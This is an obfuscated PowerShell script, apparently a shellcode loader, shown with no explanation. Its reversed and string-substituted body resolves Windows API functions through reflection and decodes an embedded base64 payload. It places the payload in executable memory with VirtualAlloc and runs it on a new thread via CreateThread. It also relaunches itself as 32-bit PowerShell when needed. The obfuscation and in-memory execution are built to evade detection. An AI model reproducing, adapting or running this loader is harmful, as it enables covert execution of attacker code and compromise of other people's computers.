sv P857  ("noisserpxE-ekovnI|)43]rahC[]gnirtS[,'Onz'(ecalpeR.)29]rahC[]gnirtS[,'OBDj'(ecalpeR.)'|',)47]rahC[+121]rahC[+87]rahC[+89]rahC[((ecalpeR.)69]rahC[]gnirtS[,'w5W4'(ecalpeR.)93]rahC[]gnirtS[,)401]rahC[+511]rahC[+501]rahC[+87]rahC[((ecalpeR.)'$','qv8r'(ecalpeR.)'
}
}tiw5W4od{qv8r )hsiNXEh'+'s'+'iN,hsiNIhsiN '+'f-Onz}1{}0{Onz(&	
{ esle
}
)hsiNiecehsiN,hsiNRhsiN,hsiNboJ-evhsiN f-Onz}0'+'{}2{}'+'1{Onz(. JyNb )hsiNiawhsiN,hsiNbhsiN,hsiNoj-thsiNf- Onz}1{}0{}2{Onz(. JyNb }Tiow5W4d{qv8r tnemugrA- 23sAnuR- } }a{qv'+'8r )hsiNEIhsiN,hsiNXhsiN f-Onz}0{'+'}1{Onz(& )}A{qv8r(marap { )hsiNboj-thsiN,hsiNrahsiN,h'+'siNts'+'hsiNf-Onz}2{}1{}0{Onz(.	
{ )8 qe- OnzeZw5W4iSOnz::eUlAV.))hsiN69:hsiN,hsiNZa8NhsiN,hsiNLBAIRAVhsiN,hsiNEhs'+'iNf- Onz}2{}3{}0{}1{Onz(  meTIDlihC-TEG(  ( fI

@hsiN
lluN-tuO JyNb )ffffffffx0,daerhth_ravqv8r(ekovnI.)))]'+'23tnI[ ,]rtPtnI[(@ epyt_etageled_teg_cnuf( ,)tcejbOelgniSroFtiaW lld.23lenrek sserdda_corp_teg_cnuf((retnioPnoitcnuFroFetageleDteG::]lahsraM.secivreSporetnI.emitnuR.metsyS[
)oreZ::]rtPtnI[,0,oreZ::]r'+'tPtnI[,reffub_ravqv8r'+',0,oreZ::'+']rtPtnI[(ekovnI.)))]rtPtnI[( )]rtPtnI[ ,]23t'+'nIU[ ,]rtPtnI[ ,]rtPtnI['+' ,]23tnIU[ ,]rtPtnI[(@ epyt_etageled_teg_cnuf'+'( ,)daerhTetaerC lld.23lenrek sserdda_corp_teg_cnuf((retnioPnoitcnuFroFetageleDteG::]lahsraM.secivr'+'eSp'+'oretnI.emitnuR.metsyS[ = daerhth_ravqv8r

)htgnel.edoc_ravqv8r ,reffub_ravqv8r ,0 ,edoc_ravqv8r('+'ypoC::]'+'lahsraM.s'+'eci'+'vreSporetn'+'I.emitnuR.metsyS[
)04x0 ,'+'0003x0,htgneL.edoc_ravqv8r ,oreZ::]rtPtnI[(ekovnI.)))]rtPtnI[( )]23tnIU[ ,]23tnIU[ ,]23tn'+'IU[ ,]rtPtnI[(@ epyt_etageled_teg_cnuf( ,)collAlautriV lld.23lenrek sserdda_corp_teg_cnuf((retnioPnoitcnuFroFetageleDteG::]lahsraM.secivreSporetnI.emitnuR.metsyS[ = reffub_ravqv8r
		'+'
)Onz=AAOxIjL3QjL2MTMuQzNx8///3B6Dj'+'V51BchDHwBL2MdAXY1/LeiWKBaWNFAAACAod15JO1UTW9/lPFpYh2VAAEAAgGAAABAoBkaV/vViWL8oBAABR2YU9y///fgon06Vs+/xo46YnIB1d'+'cOAAwLA8b1/vA4XdLaQZVUHo2V/HT1/HjXhUEaBnY1/3l4FrKaJse+JSAd2X4/xgEdA'+'XY1/vHGG0CaWd1VXd1/xU9/G'+'6pR1hmVfoGUEoG4JCAAzAIaGnY1/vjLVtOaQJVUSJlUECqMAgmUSHTW6t+'+'wJW9/G/ZiXhGUTBAABsLaRF1AqFVUJHzWAAAATme1/faeWpDaRd1VXd1/xkFAYhFWYhFWYhFWYhFWYhFWYhFWYhFWYhFWYhFWAkyNycDM14CMuIDISx0QgQV'+'RO5CI7MzM3ACZh9Gbud3bEFVUgsDMuQzL05WZklmcUByOx4SNgQlTgM3dvRmbpdFI7AjL4ASRJNVTgs'+'TZ'+'sJWa0FGct92YoACMuQzLhxGbpp3bNBAAAAI6V//BmcHToRVaul2doBAdl5GadZ46SsoWfhF4/HlWZF2WbRCJElI0BsIBLOdAcg1iLxwimNdAkg1iYJedk03O433'+'A0XH44c'+'cAN8cwsCcM/Hj1BsINLmEPjPdAgg1i'+'Yg0iQBdAKRHwFiHQLCdA8I0iQI1iXJF8ifcAN8cwgwiA8FGPsCcM/HjJKd7DoI3iUI1iMI1iwI1ikJdMlnIYAAAAJiO/Onz(gnirtS4'+'6esaBmorF::]trev'+'noC.metsyS[ = edoc_ravqv8r]'+'][etyB[

}
)(epyTetaerC.redliub_epyt_ravqv8r nrut'+'er	
	
)hsiNdeganaM ,emit'+'nuRhsiN(sga'+'lFnoitatnemelpmIteS.)sretemarap_ravqv8r ,epyt_nruter_ravqv8r ,hsiNlautriV ,tolSweN ,giSyBediH ,cilbuPhsiN ,hsiNekovnIhsi'+'N(dohteMen'+'if'+'eD.redliub_epyt_ravqv8r	
)hsiNdeganaM ,e'+'mitnuRhsiN(sgalFnoitatn'+'emelpmIteS.)sretemarap_ravqv8'+'r ,dradnatS::]snoitnevnoCgnillaC.noitcelfeR.'+'metsyS[ ,hsiNcilbuP ,giSyBediH ,emaNlaicepSTRhsiN(rotcurtsnoCen'+'i'+'feD.redliub_epyt_ravqv8r	
)'+']etageleDtsacitluM.metsyS[ ,hsiNssalCotuA ,ssalCisnA ,delaeS ,cilbuP ,ssalChsiN ,hsiNepyTetageleDyMhsiN(epyTenifeD.)es'+'lafqv8r ,hsiNeludoMyromeMnIhsiN(eludoMcimanyDenifeD.)nuR::]sseccAredliuBylbmessA.timE.noitcelfeR.metsyS[ ,))hsiNetageleDdetcelf'+'eRhsiN(emaNylbmessA.noitcelfeR.metsyS tcejbO-weN((ylbmess'+'AcimanyDenife'+'D.niamoDtnerruC::]niamoDppA[ = redli'+'u'+'b_epyt_ravqv8r	
	
)	
]dioV[ = epyt_nruter_ravqv8r ]epyT[ ])1 = noitisoP(retemaraP[		
,sretemarap_ravqv8r ]][epyT[ ])eurTqv8r = yrotadnaM ,0 = noitisoP(retemaraP[		
( '+'maraP	
{ epyt_etageled_teg_cnuf noitcnuf

}
))erudecorp_ravqv8r ,))))eludom_ravqv8r(@ ,llunqv8r(ekovn'+'I.))hsiNeldnaHeludoMteGhsiN(dohteM'+'teG.sdoh'+'tem_evitan_efasnu_ravqv8r( ,)rtPtnI tcejbO-weN((feReldna'+'H.secivreSporetnI.e'+'mitnuR.metsyS tcejbO-we'+'N(]feReldnaH.secivreSporetnI.emitnuR.metsyS[(@ ,llunqv8r(ekovnI.)hsiNsserddAcorPteGhsiN(dohteMteG.sdohtem_e'+'vitan_efasnu_rav'+'qv8r nruter	
	
)hsiNsdohteMevitaNefasnU.23niW.t'+'fosorc'+'iMhsiN'+'(epyTteG.)} )hsiNlld.metsyShsiN(slauqE.]1-[)hsiNOBDjOBDjhsiN(tilpS.noitacoL._qv8r dnA- ehcaCylbmessAlabolG._qv8r { tcejbO-erehW JyNb )(seilbmessAteG.niamoDtnerruC::]niamoDppA[( '+'= sdohtem_evitan_efasnu_ravq'+'v8r	
		)erudeco'+'rp_ravqv8'+'r ,eludom_r'+'avqv8r('+' maraP	
{ sserdda_corp_teg_cnuf noitcnuf
hsiN@ = }tIw5W4Od{qv8r

2 noisreV- )hs'+'iNtcihsiN,hs'+'iNrtS-tehsiN,hsiNedoMhsiN,hsiNShsiNf- Onz}1{}3{}2{}0{Onz(.  ;)hsiNPtNIhsiN,hsiNRThsiN F-Onz}0{}1{Onz(]Ep'+'yt[=ZA8N69qv8r  '( ") ;  (Dir VaRiAble:p857  ).VaLUe[- 1..- ((Dir VaRiAble:p857  ).VaLUe.Length)] -Join ''|Invoke-Expression
